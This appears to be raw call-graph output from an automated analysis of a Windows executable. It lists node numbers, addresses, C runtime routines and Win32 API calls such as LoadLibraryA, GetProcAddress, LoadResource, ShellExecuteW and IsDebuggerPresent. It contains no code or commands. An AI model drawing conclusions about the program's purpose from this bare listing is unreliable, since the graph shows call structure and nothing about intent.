__calloc_impl 108218->108223 108220 1313e71 108219->108220 108219->108223 108225 130889e 47 API calls __getptd_noexit 108220->108225 108221 1313e90 HeapAlloc 108221->108223 108224 1313e76 108221->108224 108223->108221 108223->108224 108224->108211 108225->108224 108227 1308995 108226->108227 108228 13089a8 EnterCriticalSection 108226->108228 108234 1308a0c 108227->108234 108228->108137 108230 130899b 108230->108228 108257 1301d7b 47 API calls 3 library calls 108230->108257 108233->108143 108235 1308a18 _raise 108234->108235 108236 1308a21 108235->108236 108237 1308a39 108235->108237 108258 1308e52 47 API calls 2 library calls 108236->108258 108243 1308a59 _raise 108237->108243 108261 1307660 108237->108261 108239 1308a26 108259 1308eb2 47 API calls 8 library calls 108239->108259 108243->108230 108244 1308a63 108248 1308984 __lock 46 API calls 108244->108248 108245 1308a54 108267 130889e 47 API calls __getptd_noexit 108245->108267 108246 1308a2d 108260 1301d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108246->108260 108250 1308a6a 108248->108250 108252 1308a79 InitializeCriticalSectionAndSpinCount 108250->108252 108253 1308a8e 108250->108253 108254 1308a94 108252->108254 108268 13028ca 108253->108268 108274 1308aaa LeaveCriticalSection _doexit 108254->108274 108258->108239 108259->108246 108264 130766e 108261->108264 108263 13076a2 108263->108244 108263->108245 108264->108263 108265 1307681 Sleep 108264->108265 108275 13045ec 108264->108275 108266 130769a 108265->108266 108266->108263 108266->108264 108267->108243 108269 13028d3 HeapFree 108268->108269 108273 13028fc _free 108268->108273 108270 13028e8 108269->108270 108269->108273 108295 130889e 47 API calls __getptd_noexit 108270->108295 108272 13028ee GetLastError 108272->108273 108273->108254 108274->108243 108276 1304667 __calloc_impl 108275->108276 108280 13045f8 __calloc_impl 108275->108280 108294 130889e 47 API calls __getptd_noexit 108276->108294 108279 130462b RtlAllocateHeap 108279->108280 108288 130465f 108279->108288 108280->108279 108282 1304653 108280->108282 108283 1304603 108280->108283 108286 1304651 108280->108286 108292 130889e 47 API calls __getptd_noexit 108282->108292 108283->108280 108289 1308e52 47 API calls 2 library calls 108283->108289 108290 1308eb2 47 API calls 8 library calls 108283->108290 108291 1301d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 108283->108291 108293 130889e 47 API calls __getptd_noexit 108286->108293 108288->108264 108289->108283 108290->108283 108292->108286 108293->108288 108294->108288 108295->108272 108296->108173 108298 1307abb 108297->108298 108303 1307945 108298->108303 108302 1307ad6 108302->108176 108304 130795f _memset __call_reportfault 108303->108304 108305 130797f IsDebuggerPresent 108304->108305 108311 1308e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 108305->108311 108308 1307a43 __call_reportfault 108312 130b4bf 108308->108312 108309 1307a66 108310 1308e27 GetCurrentProcess TerminateProcess 108309->108310 108310->108302 108311->108308 108313 130b4c7 108312->108313 108314 130b4c9 IsProcessorFeaturePresent 108312->108314 108313->108309 108316 1314560 108314->108316 108319 131450f 5 API calls 2 library calls 108316->108319 108318 1314643 108318->108309 108319->108318 108320->108180 108322 1308984 __lock 47 API calls 108321->108322 108323 1302030 108322->108323 108379 1308ae8 LeaveCriticalSection 108323->108379 108325 12e36fb 108326 130208d 108325->108326 108327 13020b1 108326->108327 108328 1302097 108326->108328 108327->108188 108328->108327 108380 130889e 47 API calls __getptd_noexit 108328->108380 108330 13020a1 108381 1307aa0 8 API calls __controlfp_s 108330->108381 108332 13020ac 108332->108188 108333->108190 108382 12e4257 108334->108382 108336 12e377f IsDebuggerPresent 108337 13521b7 MessageBoxA 108336->108337 108338 12e378d 108336->108338 108340 13521d0 108337->108340 108339 12e37aa 108338->108339 108338->108340 108368 12e3852 108338->108368 108446 12e3bff 108339->108446 108553 1322f5b 48 API calls 108340->108553 108341 12e3859 SetCurrentDirectoryW 108343 12e3716 SystemParametersInfoW 108341->108343 108343->108193 108346 13521e0 108350 13521f6 SetCurrentDirectoryW 108346->108350 108347 12e37c8 GetFullPathNameW 108458 12e34f3 108347->108458 108350->108343 108351 12e380f 108352 12e3818 108351->108352 108554 131be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 108351->108554 108473 12e30a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 108352->108473 108355 1352213 108355->108352 108358 1352224 GetModuleFileNameW 108355->108358 108555 12ecaee 108358->108555 108359 12e3822 108361 12e3837 108359->108361 108481 12e3598 108359->108481 108491 12ee1f0 108361->108491 108366 1352271 108562 12e39e8 48 API calls 2 library calls 108366->108562 108367 135224c 108559 12e39e8 48 API calls 2 library calls 108367->108559 108368->108341 108372 135226d GetForegroundWindow ShellExecuteW 108376 13522a5 Mailbox 108372->108376 108373 1352257 108560 12e39e8 48 API calls 2 library calls 108373->108560 108376->108368 108377 1352264 108561 12e39e8 48 API calls 2 library calls 108377->108561 108379->108325 108380->108330 108381->108332 108563 12e3c70 108382->108563 108386 12e4278 GetModuleFileNameW 108580 12e34c1 108386->108580 108391 12ecaee 48 API calls 108392 12e42ba 108391->108392 108595 12ed380 108392->108595 108394 12e42ca Mailbox 108395 12ecaee 48 API calls 108394->108395 108396 12e42f2 108395->108396 108397 12ed380 55 API calls 108396->108397 108398 12e4305 Mailbox 108397->108398 108399 12ecaee 48 API calls 108398->108399 108400 12e4316 108399->108400 108599 12ed2d2 108400->108599 108402 12e4328 Mailbox 108605 12ed3d2 108402->108605 108408 12e4355 108409 12e435f 108408->108409 108410 13520f7 108408->108410 108412 1301bc7 _W_store_winword 59 API calls 108409->108412 108411 12e4477 48 API calls 108410->108411 108413 135210b 108411->108413 108414 12e436a 108412->108414 108416 12e4477 48 API calls 108413->108416 108414->108413 108415 12e4374 108414->108415 108417 1301bc7 _W_store_winword 59 API calls 108415->108417 108418 1352127 108416->108418 108419 12e437f 108417->108419 108421 135212f GetModuleFileNameW 108418->108421 108420 12e4389 108419->108420 108419->108421 108423 1301bc7 _W_store_winword 59 API calls 108420->108423 108422 12e4477 48 API calls 108421->108422 108424 1352160 108422->108424 108425 12e4394 108423->108425 108654 12ec935 48 API calls 108424->108654 108426 12e43d6 108425->108426 108430 12e4477 48 API calls 108425->108430 108433 1352185 _wcscpy 108425->108433 108428 12e43e7 108426->108428 108426->108433 108626 12e3320 108428->108626 108429 135216e 108431 12e4477 48 API calls 108429->108431 108432 12e43b8 _wcscpy 108430->108432 108435 135217d 108431->108435 108440 12e4477 48 API calls 108432->108440 108436 12e4477 48 API calls 108433->108436 108435->108433 108438 13521ab 108436->108438 108437 12e43ff 108637 12f14a0 108437->108637 108438->108438 108440->108426 108441 12f14a0 48 API calls 108443 12e440f 108441->108443 108443->108441 108444 12e4477 48 API calls 108443->108444 108445 12e4451 Mailbox 108443->108445 108653 12e7bef 48 API calls 108443->108653 108444->108443 108445->108336 108447 1353ce4 _memset 108446->108447 108448 12e3c1f 108446->108448 108450 1353cf6 GetOpenFileNameW 108447->108450 109165 12e31b8 108448->109165 108450->108448 108452 12e37c0 108450->108452 108451 12e3c28 109172 12e3a67 SHGetMalloc 108451->109172 108452->108347 108452->108368 108454 12e3c31 109177 12e3b45 GetFullPathNameW 108454->109177 109240 12ea716 108458->109240 108460 12e3501 108461 12e3575 108460->108461 109251 12e21dd 86 API calls 108460->109251 108461->108346 108461->108351 108463 12e350a 108463->108461 109252 12e5460 88 API calls Mailbox 108463->109252 108465 12e3513 108465->108461 108466 12e3517 GetFullPathNameW 108465->108466 108467 12e7e53 48 API calls 108466->108467 108468 12e3541 108467->108468 108469 12e7e53 48 API calls 108468->108469 108470 12e354e 108469->108470 108471 13566b4 _wcscat 108470->108471 108472 12e7e53 48 API calls 108470->108472 108472->108461 108474 12e310f 108473->108474 108475 13521b0 108473->108475 109257 12e318a 108474->109257 108479 12e3185 108480 12e2e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 108479->108480 108480->108359 108482 12e35c3 _memset 108481->108482 109262 12e38c4 108482->109262 108485 12e3648 108487 13545c2 Shell_NotifyIconW 108485->108487 108488 12e3666 Shell_NotifyIconW 108485->108488 109266 12e38e4 108488->109266 108490 12e367b 108490->108361 108492 12ee216 108491->108492 108550 12ee226 Mailbox 108491->108550 108493 12ee670 108492->108493 108492->108550 109370 12fecee 346 API calls 108493->109370 108495 12e3842 108495->108368 108552 12e2b94 Shell_NotifyIconW _memset 108495->108552 108497 12ee681 108497->108495 108498 12ee68e 108497->108498 109372 12fec33 346 API calls Mailbox 108498->109372 108499 12ee26c PeekMessageW 108499->108550 108501 12ee695 LockWindowUpdate DestroyWindow GetMessageW 108501->108495 108504 12ee6c7 108501->108504 108502 1355b13 Sleep 108502->108550 108506 13562a7 TranslateMessage DispatchMessageW GetMessageW 108504->108506 108505 12ee4e7 108505->108495 109371 12e322e 16 API calls 108505->109371 108506->108506 108509 13562d7 108506->108509 108508 12fcf79 49 API calls 108508->108550 108509->108495 108510 12ee657 PeekMessageW 108510->108550 108511 12ee517 timeGetTime 108511->108550 108513 130010a 48 API calls 108513->108550 108515 12ee641 TranslateMessage DispatchMessageW 108515->108510 108516 1355dfc WaitForSingleObject 108517 1355e19 GetExitCodeProcess CloseHandle 108516->108517 108516->108550 108517->108550 108518 12ed3d2 48 API calls 108545 1355cce Mailbox 108518->108545 108519 1356147 Sleep 108519->108545 108520 12ee6cc timeGetTime 109373 12fcf79 49 API calls 108520->109373 108521 1355feb Sleep 108521->108545 108525 13561de GetExitCodeProcess 108528 13561f4 WaitForSingleObject 108525->108528 108529 135620a CloseHandle 108525->108529 108527 12fe3a5 timeGetTime 108527->108545 108528->108529 108528->108550 108529->108545 108530 1355cea Sleep 108530->108550 108531 1355cd7 Sleep 108531->108530 108532 1348a48 108 API calls 108532->108545 108533 12e1dce 107 API calls 108533->108545 108535 1356266 Sleep 108535->108550 108536 12ecaee 48 API calls 108536->108545 108540 12ed380 55 API calls 108540->108545 108545->108518 108545->108525 108545->108527 108545->108530 108545->108531 108545->108532 108545->108533 108545->108535 108545->108536 108545->108540 108545->108550 109376 13256dc 49 API calls Mailbox 108545->109376 109377 12fcf79 49 API calls 108545->109377 109378 12e1000 346 API calls 108545->109378 109418 133d12a 50 API calls 108545->109418 109419 1328355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108545->109419 109420 1326f5b 63 API calls 3 library calls 108545->109420 108547 12ed380 55 API calls 108547->108550 108548 132d520 86 API calls 108548->108550 108549 12ecaee 48 API calls 108549->108550 108550->108499 108550->108502 108550->108505 108550->108508 108550->108510 108550->108511 108550->108513 108550->108515 108550->108516 108550->108519 108550->108520 108550->108521 108550->108530 108550->108545 108550->108547 108550->108548 108550->108549 108551 12e1000 322 API calls 108550->108551 109298 12eea00 108550->109298 109348 12f44e0 108550->109348 109365 12ee7b0 346 API calls Mailbox 108550->109365 109366 12ee7e0 346 API calls 108550->109366 109367 12f3680 346 API calls 2 library calls 108550->109367 109368 12ff381 TranslateAcceleratorW 108550->109368 109369 12fed1a IsDialogMessageW GetClassLongW 108550->109369 109374 12ec935 48 API calls 108550->109374 109375 1348b20 48 API calls 108550->109375 109379 12efa40 108550->109379 108551->108550 108552->108368 108553->108346 108554->108355 108556 12ecafd __wsetenvp _memmove 108555->108556 108557 130010a 48 API calls 108556->108557 108558 12ecb3b 108557->108558 108558->108366 108558->108367 108559->108373 108560->108377 108561->108372 108562->108372 108564 12ed3d2 48 API calls 108563->108564 108565 12e3c80 108564->108565 108566 12ea359 108565->108566 108567 12ea366 __ftell_nolock 108566->108567 108573 12ea4cc Mailbox 108567->108573 108655 12e7e53 108567->108655 108570 12ea398 108579 12ea3ce Mailbox 108570->108579 108664 12ea4f6 108570->108664 108571 12ea49f 108572 12ecaee 48 API calls 108571->108572 108571->108573 108575 12ea4c0 108572->108575 108573->108386 108574 12ecaee 48 API calls 108574->108579 108668 12e5b47 48 API calls _memmove 108575->108668 108577 12ea4f6 48 API calls 108577->108579 108579->108571 108579->108573 108579->108574 108579->108577 108667 12e5b47 48 API calls _memmove 108579->108667 108692 12e3f9b 108580->108692 108583 12e34ea 108592 12e8182 108583->108592 108586 13534c3 108588 13028ca _free 47 API calls 108586->108588 108589 13534d0 108588->108589 108590 12e3e39 84 API calls 108589->108590 108591 13534d9 108590->108591 108591->108591 108593 130010a 48 API calls 108592->108593 108594 12e42ad 108593->108594 108594->108391 108596 12ed38b 108595->108596 108597 12ed3b4 108596->108597 109154 12ed772 55 API calls 108596->109154 108597->108394 108600 12ed30a 108599->108600 108602 12ed2df 108599->108602 108600->108402 108601 12ed2e6 108601->108600 109155 12ed349 53 API calls 108601->109155 108602->108601 109156 12ed349 53 API calls 108602->109156 108606 130010a 48 API calls 108605->108606 108607 12ed3f3 108606->108607 108608 130010a 48 API calls 108607->108608 108609 12e433b 108608->108609 108610 12e4477 108609->108610 108611 12e449a 108610->108611 108612 12e4481 108610->108612 108614 12e7e53 48 API calls 108611->108614 109157 12ec935 48 API calls 108612->109157 108615 12e4347 108614->108615 108616 1301bc7 108615->108616 108617 1301bd3 108616->108617 108618 1301c48 108616->108618 108625 1301bf8 108617->108625 109158 130889e 47 API calls __getptd_noexit 108617->109158 109160 1301c5a 59 API calls 4 library calls 108618->109160 108621 1301c55 108621->108408 108622 1301bdf 109159 1307aa0 8 API calls __controlfp_s 108622->109159 108624 1301bea 108624->108408 108625->108408 108627 12e3334 108626->108627 108629 12e3339 Mailbox 108626->108629 109161 12e342c 48 API calls 108627->109161 108635 12e3347 108629->108635 109162 12e346e 48 API calls 108629->109162 108631 130010a 48 API calls 108633 12e33d8 108631->108633 108632 12e3422 108632->108437 108634 130010a 48 API calls 108633->108634 108636 12e33e3 108634->108636 108635->108631 108635->108632 108636->108437 108638 12f1606 108637->108638 108640 12f14b2 108637->108640 108638->108443 108639 12f14be 108644 12f14c9 108639->108644 109164 12e346e 48 API calls 108639->109164 108640->108639 108642 130010a 48 API calls 108640->108642 108643 1355299 108642->108643 108646 130010a 48 API calls 108643->108646 108645 12f156d 108644->108645 108647 130010a 48 API calls 108644->108647 108645->108443 108652 13552a4 108646->108652 108648 12f15af 108647->108648 108649 12f15c2 108648->108649 109163 12fd6b4 48 API calls 108648->109163 108649->108443 108651 130010a 48 API calls 108651->108652 108652->108639 108652->108651 108653->108443 108654->108429 108656 12e7ecf 108655->108656 108658 12e7e5f __wsetenvp 108655->108658 108673 12ea2fb 108656->108673 108659 12e7e7b 108658->108659 108660 12e7ec7 108658->108660 108669 12ea6f8 108659->108669 108672 12e7eda 48 API calls 108660->108672 108663 12e7e85 _memmove 108663->108570 108665 12eb8a7 48 API calls 108664->108665 108666 12ea501 108665->108666 108666->108570 108667->108579 108668->108573 108677 130010a 108669->108677 108671 12ea702 108671->108663 108672->108663 108674 12ea321 _memmove 108673->108674 108675 12ea309 108673->108675 108674->108663 108675->108674 108688 12eb8a7 108675->108688 108679 1300112 __calloc_impl 108677->108679 108678 13045ec std::exception::_Copy_str 47 API calls 108678->108679 108679->108678 108680 130012c 108679->108680 108681 130012e std::exception::exception 108679->108681 108680->108671 108686 1307495 RaiseException 108681->108686 108683 1300158 108687 13073cb 47 API calls _free 108683->108687 108685 130016a 108685->108671 108686->108683 108687->108685 108689 12eb8ba 108688->108689 108691 12eb8b7 _memmove 108688->108691 108690 130010a 48 API calls 108689->108690 108690->108691 108691->108674 108757 12e3f5d 108692->108757 108697 1355830 108699 12e3e39 84 API calls 108697->108699 108698 12e3fc6 LoadLibraryExW 108767 12e3e78 108698->108767 108701 1355837 108699->108701 108703 12e3e78 3 API calls 108701->108703 108705 135583f 108703->108705 108793 12e417d 108705->108793 108706 12e3fed 108706->108705 108707 12e3ff9 108706->108707 108708 12e3e39 84 API calls 108707->108708 108710 12e34e2 108708->108710 108710->108583 108716 132cc82 108710->108716 108713 1355866 108801 12e41cb 108713->108801 108715 1355873 108717 12e41a7 83 API calls 108716->108717 108718 132ccf1 108717->108718 108981 132ce59 108718->108981 108721 12e417d 64 API calls 108722 132cd1e 108721->108722 108723 12e417d 64 API calls 108722->108723 108724 132cd2e 108723->108724 108725 12e417d 64 API calls 108724->108725 108726 132cd49 108725->108726 108727 12e417d 64 API calls 108726->108727 108728 132cd64 108727->108728 108729 12e41a7 83 API calls 108728->108729 108730 132cd7b 108729->108730 108731 13045ec std::exception::_Copy_str 47 API calls 108730->108731 108732 132cd82 108731->108732 108733 13045ec std::exception::_Copy_str 47 API calls 108732->108733 108734 132cd8c 108733->108734 108735 12e417d 64 API calls 108734->108735 108736 132cda0 108735->108736 108737 132c846 GetSystemTimeAsFileTime 108736->108737 108738 132cdb3 108737->108738 108739 132cdc8 108738->108739 108740 132cddd 108738->108740 108743 13028ca _free 47 API calls 108739->108743 108741 132ce42 108740->108741 108742 132cde3 108740->108742 108745 13028ca _free 47 API calls 108741->108745 108987 132c251 108742->108987 108746 132cdce 108743->108746 108750 132cd07 108745->108750 108748 13028ca _free 47 API calls 108746->108748 108748->108750 108749 13028ca _free 47 API calls 108749->108750 108750->108586 108751 12e3e39 108750->108751 108752 12e3e43 108751->108752 108754 12e3e4a 108751->108754 108753 1304274 __fcloseall 83 API calls 108752->108753 108753->108754 108755 12e3e6a FreeLibrary 108754->108755 108756 12e3e59 108754->108756 108755->108756 108756->108586 108806 12e3f20 108757->108806 108760 12e3f85 108762 12e3f8d FreeLibrary 108760->108762 108763 12e3f96 108760->108763 108762->108763 108764 1304129 108763->108764 108814 130413e 108764->108814 108766 12e3fba 108766->108697 108766->108698 108892 12e3eb3 108767->108892 108770 12e3e9f 108772 12e3ea8 FreeLibrary 108770->108772 108773 12e3eb1 108770->108773 108772->108773 108774 12e4010 108773->108774 108775 130010a 48 API calls 108774->108775 108776 12e4025 108775->108776 108900 12e4bce 108776->108900 108778 12e4031 _memmove 108779 12e406c 108778->108779 108781 12e4129 108778->108781 108782 12e4161 108778->108782 108780 12e41cb 57 API calls 108779->108780 108789 12e4075 108780->108789 108903 12e31f2 CreateStreamOnHGlobal 108781->108903 108914 132d03f 93 API calls 108782->108914 108785 12e417d 64 API calls 108785->108789 108787 12e4109 108787->108706 108788 1355794 108790 12e41a7 83 API calls 108788->108790 108789->108785 108789->108787 108789->108788 108909 12e41a7 108789->108909 108791 13557a8 108790->108791 108792 12e417d 64 API calls 108791->108792 108792->108787 108794 12e418f 108793->108794 108796 135587d 108793->108796 108938 13044ae 108794->108938 108798 132c846 108958 132c6a0 108798->108958 108800 132c85c 108800->108713 108802 12e41da 108801->108802 108803 13558bf 108801->108803 108963 1304af5 108802->108963 108805 12e41e2 108805->108715 108810 12e3f32 108806->108810 108809 12e3f08 LoadLibraryA GetProcAddress 108809->108760 108811 12e3f28 108810->108811 108812 12e3f3b LoadLibraryA 108810->108812 108811->108760 108811->108809 108812->108811 108813 12e3f4c GetProcAddress 108812->108813 108813->108811 108817 130414a _raise 108814->108817 108815 130415d 108862 130889e 47 API calls __getptd_noexit 108815->108862 108817->108815 108818 130418e 108817->108818 108833 130f278 108818->108833 108819 1304162 108863 1307aa0 8 API calls __controlfp_s 108819->108863 108822 1304193 108823 13041a9 108822->108823 108824 130419c 108822->108824 108826 13041d3 108823->108826 108827 13041b3 108823->108827 108864 130889e 47 API calls __getptd_noexit 108824->108864 108847 130f390 108826->108847 108865 130889e 47 API calls __getptd_noexit 108827->108865 108832 130416d _raise @_EH4_CallFilterFunc@8 108832->108766 108834 130f284 _raise 108833->108834 108835 1308984 __lock 47 API calls 108834->108835 108836 130f292 108835->108836 108837 130f309 108836->108837 108844 1308a0c __mtinitlocknum 47 API calls 108836->108844 108845 130f302 108836->108845 108870 1305ade 48 API calls __lock 108836->108870 108871 1305b48 LeaveCriticalSection LeaveCriticalSection _doexit 108836->108871 108838 1307660 __malloc_crt 47 API calls 108837->108838 108840 130f310 108838->108840 108842 130f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 108840->108842 108840->108845 108841 130f37c _raise 108841->108822 108842->108845 108844->108836 108867 130f387 108845->108867 108855 130f3b0 __wopenfile 108847->108855 108848 130f3ca 108876 130889e 47 API calls __getptd_noexit 108848->108876 108850 130f3cf 108877 1307aa0 8 API calls __controlfp_s 108850->108877 108852 130f5e8 108873 1317179 108852->108873 108853 13041de 108866 1304200 LeaveCriticalSection LeaveCriticalSection _fseek 108853->108866 108855->108848 108861 130f585 108855->108861 108878 130247b 59 API calls 3 library calls 108855->108878 108857 130f57e 108857->108861 108879 130247b 59 API calls 3 library calls 108857->108879 108859 130f59d 108859->108861 108880 130247b 59 API calls 3 library calls 108859->108880 108861->108848 108861->108852 108862->108819 108863->108832 108864->108832 108865->108832 108866->108832 108872 1308ae8 LeaveCriticalSection 108867->108872 108869 130f38e 108869->108841 108870->108836 108871->108836 108872->108869 108881 1316961 108873->108881 108875 1317192 108875->108853 108876->108850 108877->108853 108878->108857 108879->108859 108880->108861 108884 131696d _raise 108881->108884 108882 131697f 108883 130889e __calloc_impl 47 API calls 108882->108883 108885 1316984 108883->108885 108884->108882 108886 13169b6 108884->108886 108887 1307aa0 __controlfp_s 8 API calls 108885->108887 108888 1316a28 __wsopen_helper 110 API calls 108886->108888 108891 131698e _raise 108887->108891 108889 13169d3 108888->108889 108890 13169fc __wsopen_helper LeaveCriticalSection 108889->108890 108890->108891 108891->108875 108896 12e3ec5 108892->108896 108895 12e3ef0 LoadLibraryA GetProcAddress 108895->108770 108897 12e3e91 108896->108897 108898 12e3ece LoadLibraryA 108896->108898 108897->108770 108897->108895 108898->108897 108899 12e3edf GetProcAddress 108898->108899 108899->108897 108901 130010a 48 API calls 108900->108901 108902 12e4be0 108901->108902 108902->108778 108904 12e320c FindResourceExW 108903->108904 108908 12e3229 108903->108908 108905 13557d3 LoadResource 108904->108905 108904->108908 108906 13557e8 SizeofResource 108905->108906 108905->108908 108907 13557fc LockResource 108906->108907 108906->108908 108907->108908 108908->108779 108910 135589d 108909->108910 108911 12e41b6 108909->108911 108915 130471d 108911->108915 108913 12e41c4 108913->108789 108914->108779 108918 1304729 _raise 108915->108918 108916 1304737 108928 130889e 47 API calls __getptd_noexit 108916->108928 108918->108916 108919 130475d 108918->108919 108930 1305a9f 108919->108930 108920 130473c 108929 1307aa0 8 API calls __controlfp_s 108920->108929 108923 1304763 108936 130468e 81 API calls 4 library calls 108923->108936 108924 1304747 _raise 108924->108913 108926 1304772 108937 1304794 LeaveCriticalSection LeaveCriticalSection _fseek 108926->108937 108928->108920 108929->108924 108931 1305ad1 EnterCriticalSection 108930->108931 108932 1305aaf 108930->108932 108934 1305ac7 108931->108934 108932->108931 108933 1305ab7 108932->108933 108935 1308984 __lock 47 API calls 108933->108935 108934->108923 108935->108934 108936->108926 108937->108924 108941 13044c9 108938->108941 108940 12e41a0 108940->108798 108942 13044d5 _raise 108941->108942 108943 1304518 108942->108943 108944 13044eb _memset 108942->108944 108945 1304510 _raise 108942->108945 108946 1305a9f __lock_file 48 API calls 108943->108946 108954 130889e 47 API calls __getptd_noexit 108944->108954 108945->108940 108948 130451e 108946->108948 108956 13042eb 62 API calls 7 library calls 108948->108956 108949 1304505 108955 1307aa0 8 API calls __controlfp_s 108949->108955 108951 1304534 108957 1304552 LeaveCriticalSection LeaveCriticalSection _fseek 108951->108957 108954->108949 108955->108945 108956->108951 108957->108945 108961 13040da GetSystemTimeAsFileTime 108958->108961 108960 132c6af 108960->108800 108962 1304108 __aulldiv 108961->108962 108962->108960 108964 1304b01 _raise 108963->108964 108965 1304b24 108964->108965 108966 1304b0f 108964->108966 108968 1305a9f __lock_file 48 API calls 108965->108968 108977 130889e 47 API calls __getptd_noexit 108966->108977 108970 1304b2a 108968->108970 108969 1304b14 108978 1307aa0 8 API calls __controlfp_s 108969->108978 108979 130479c 55 API calls 5 library calls 108970->108979 108973 1304b35 108980 1304b55 LeaveCriticalSection LeaveCriticalSection _fseek 108973->108980 108975 1304b47 108976 1304b1f _raise 108975->108976 108976->108805 108977->108969 108978->108976 108979->108973 108980->108975 108986 132ce6d __tzset_nolock _wcscmp 108981->108986 108982 132cd03 108982->108721 108982->108750 108983 12e417d 64 API calls 108983->108986 108984 132c846 GetSystemTimeAsFileTime 108984->108986 108985 12e41a7 83 API calls 108985->108986 108986->108982 108986->108983 108986->108984 108986->108985 108988 132c26a 108987->108988 108989 132c25c 108987->108989 108991 132c2af 108988->108991 108992 1304129 117 API calls 108988->108992 109017 132c273 108988->109017 108990 1304129 117 API calls 108989->108990 108990->108988 109031 132c4d4 64 API calls 3 library calls 108991->109031 108994 132c294 108992->108994 108994->108991 108997 132c29d 108994->108997 108995 132c2f3 108996 132c318 108995->108996 109001 132c2f7 108995->109001 109032 132c0d1 47 API calls std::exception::_Copy_str 108996->109032 108997->109017 109018 1304274 108997->109018 109000 132c304 109006 1304274 __fcloseall 83 API calls 109000->109006 109000->109017 109001->109000 109003 1304274 __fcloseall 83 API calls 109001->109003 109002 132c320 109004 132c346 109002->109004 109005 132c326 109002->109005 109003->109000 109033 132c376 90 API calls 109004->109033 109007 132c333 109005->109007 109009 1304274 __fcloseall 83 API calls 109005->109009 109006->109017 109011 1304274 __fcloseall 83 API calls 109007->109011 109007->109017 109009->109007 109010 132c34d 109034 132c450 47 API calls _free 109010->109034 109011->109017 109013 132c354 109014 132c361 109013->109014 109015 1304274 __fcloseall 83 API calls 109013->109015 109016 1304274 __fcloseall 83 API calls 109014->109016 109014->109017 109015->109014 109016->109017 109017->108749 109019 1304280 _raise 109018->109019 109020 1304294 109019->109020 109021 13042ac 109019->109021 109051 130889e 47 API calls __getptd_noexit 109020->109051 109024 13042a4 _raise 109021->109024 109025 1305a9f __lock_file 48 API calls 109021->109025 109023 1304299 109052 1307aa0 8 API calls __controlfp_s 109023->109052 109024->109017 109027 13042be 109025->109027 109035 1304208 109027->109035 109031->108995 109032->109002 109033->109010 109034->109013 109036 1304217 109035->109036 109037 130422b 109035->109037 109094 130889e 47 API calls __getptd_noexit 109036->109094 109044 1304227 109037->109044 109054 1303914 109037->109054 109040 130421c 109095 1307aa0 8 API calls __controlfp_s 109040->109095 109053 13042e3 LeaveCriticalSection LeaveCriticalSection _fseek 109044->109053 109047 1304245 109071 130f782 109047->109071 109049 130424b 109049->109044 109050 13028ca _free 47 API calls 109049->109050 109050->109044 109051->109023 109052->109024 109053->109024 109055 1303927 109054->109055 109059 130394b 109054->109059 109056 13035c3 __fputwc_nolock 47 API calls 109055->109056 109055->109059 109057 1303944 109056->109057 109096 130bd14 109057->109096 109060 130f8e6 109059->109060 109061 130423f 109060->109061 109062 130f8f3 109060->109062 109064 13035c3 109061->109064 109062->109061 109063 13028ca _free 47 API calls 109062->109063 109063->109061 109065 13035e2 109064->109065 109066 13035cd 109064->109066 109065->109047 109121 130889e 47 API calls __getptd_noexit 109066->109121 109068 13035d2 109122 1307aa0 8 API calls __controlfp_s 109068->109122 109070 13035dd 109070->109047 109072 130f78e _raise 109071->109072 109073 130f796 109072->109073 109074 130f7ae 109072->109074 109147 130886a 47 API calls __getptd_noexit 109073->109147 109076 130f82b 109074->109076 109081 130f7d8 109074->109081 109151 130886a 47 API calls __getptd_noexit 109076->109151 109077 130f79b 109148 130889e 47 API calls __getptd_noexit 109077->109148 109080 130f830 109152 130889e 47 API calls __getptd_noexit 109080->109152 109123 130b6a0 109081->109123 109084 130f7de 109087 130f7f1 109084->109087 109088 130f7fc 109084->109088 109085 130f838 109153 1307aa0 8 API calls __controlfp_s 109085->109153 109132 130f84c 109087->109132 109149 130889e 47 API calls __getptd_noexit 109088->109149 109090 130f7a3 _raise 109090->109049 109092 130f7f7 109150 130f823 LeaveCriticalSection __unlock_fhandle 109092->109150 109094->109040 109095->109044 109097 130bd20 _raise 109096->109097 109098 130bd40 109097->109098 109099 130bd28 109097->109099 109100 130bdd5 109098->109100 109105 130bd72 109098->109105 109101 130886a __set_osfhnd 47 API calls 109099->109101 109102 130886a __set_osfhnd 47 API calls 109100->109102 109103 130bd2d 109101->109103 109104 130bdda 109102->109104 109106 130889e __calloc_impl 47 API calls 109103->109106 109107 130889e __calloc_impl 47 API calls 109104->109107 109108 130b6a0 ___lock_fhandle 49 API calls 109105->109108 109114 130bd35 _raise 109106->109114 109109 130bde2 109107->109109 109110 130bd78 109108->109110 109111 1307aa0 __controlfp_s 8 API calls 109109->109111 109112 130bd8b 109110->109112 109113 130bd9e 109110->109113 109111->109114 109115 130bdf6 __chsize_nolock 75 API calls 109112->109115 109116 130889e __calloc_impl 47 API calls 109113->109116 109114->109059 109117 130bd97 109115->109117 109118 130bda3 109116->109118 109120 130bdcd __flswbuf LeaveCriticalSection 109117->109120 109119 130886a __set_osfhnd 47 API calls 109118->109119 109119->109117 109120->109114 109121->109068 109122->109070 109124 130b6ac _raise 109123->109124 109125 130b6f9 EnterCriticalSection 109124->109125 109126 1308984 __lock 47 API calls 109124->109126 109127 130b71f _raise 109125->109127 109128 130b6d0 109126->109128 109127->109084 109129 130b6db InitializeCriticalSectionAndSpinCount 109128->109129 109130 130b6ed 109128->109130 109129->109130 109131 130b723 ___lock_fhandle LeaveCriticalSection 109130->109131 109131->109125 109133 130b957 __lseeki64_nolock 47 API calls 109132->109133 109136 130f85a 109133->109136 109134 130f8b0 109135 130b8d1 __free_osfhnd 48 API calls 109134->109135 109140 130f8b8 109135->109140 109136->109134 109137 130f88e 109136->109137 109138 130b957 __lseeki64_nolock 47 API calls 109136->109138 109137->109134 109139 130b957 __lseeki64_nolock 47 API calls 109137->109139 109141 130f885 109138->109141 109142 130f89a CloseHandle 109139->109142 109145 130887d __dosmaperr 47 API calls 109140->109145 109146 130f8da 109140->109146 109143 130b957 __lseeki64_nolock 47 API calls 109141->109143 109142->109134 109144 130f8a6 GetLastError 109142->109144 109143->109137 109144->109134 109145->109146 109146->109092 109147->109077 109148->109090 109149->109092 109150->109090 109151->109080 109152->109085 